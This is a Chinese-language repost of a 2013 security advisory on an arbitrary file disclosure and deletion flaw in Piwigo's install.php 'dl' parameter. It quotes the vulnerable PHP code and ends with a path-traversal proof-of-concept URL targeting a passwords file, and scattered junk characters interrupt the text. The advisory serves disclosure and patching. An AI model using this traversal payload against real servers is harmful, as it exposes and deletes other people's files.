Piwigo任意文件泄露和任意文件删除漏洞

admin

Piwigo是用PHP编写的相册脚本。

: r6 D0 O- _. K# e# a. ^& P! z! yPiwigo 2.4.6及其他版本没有正确验证install.php脚本的 'dl'参数值，在实现上存在安全漏洞，攻击者可利用这些漏洞查看受影响计算机上的任意文件，删除受影响应用上下文内的任意文件。
====================================================================
  H1 D1 ?. {+ a9 s- T/install.php:
: |6 s3 @' j  L% a-------------
113: if (!empty($_GET['dl']) && file_exists(PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl']))
  F) P( x% i# J% r; @114: {
4 N! f8 \9 c' d6 V. I/ j# _115:   $filename = PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl'];
! M2 d, A2 U, H3 e0 U: r116:   header('Cache-Control: no-cache, must-revalidate');
117:   header('Pragma: no-cache');
' S/ F2 n. K- E# f( k118:   header('Content-Disposition: attachment; filename="database.inc.php"');
5 O2 {( Q  X- {/ p! l4 N119:   header('Content-Transfer-Encoding: binary');
1 O% _6 |2 o& [) M) f* U! a120:   header('Content-Length: '.filesize($filename));
121:   echo file_get_contents($filename);
122:   unlink($filename);
. i. e$ }" K2 T123:   exit();
, {8 _/ ~$ ~' e3 i0 v0 f! g124: }
9 C. h' x0 v0 X0 b$ C6 ~====================================================================
; o( s8 q0 B. @5 E6 L& {& \$ T
% W2 s7 q9 E$ T2 ^( J9 kTested on: Microsoft Windows 7 Ultimate SP1 (EN)
           Apache 2.4.2 (Win32)
           PHP 5.4.4
           MySQL 5.5.25a

' s0 r. I* T# Z; t! }" iVulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience
& T2 y, n1 {2 J; c2 A
" j: F5 b: k0 ]7 MAdvisory ID: ZSL-2013-5127
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5127.php
Vendor Patch: http://piwigo.org/bugs/view.php?id=2843
% `4 d2 f/ P' c* c
! N( n5 q0 ?( a3 v15.02.2013

( \6 ~& A6 U& o0 I" ]; g  F% o--
1 ]0 |5 q' C& ~, H5 h+ U9 Thttp://localhost/piwigo/install.php?dl=../../../../../../lio_passwords.txt
& k- l4 \; n" a1 _! x2 e
9 w9 h$ E. z( V" ?- M% l8 g4 W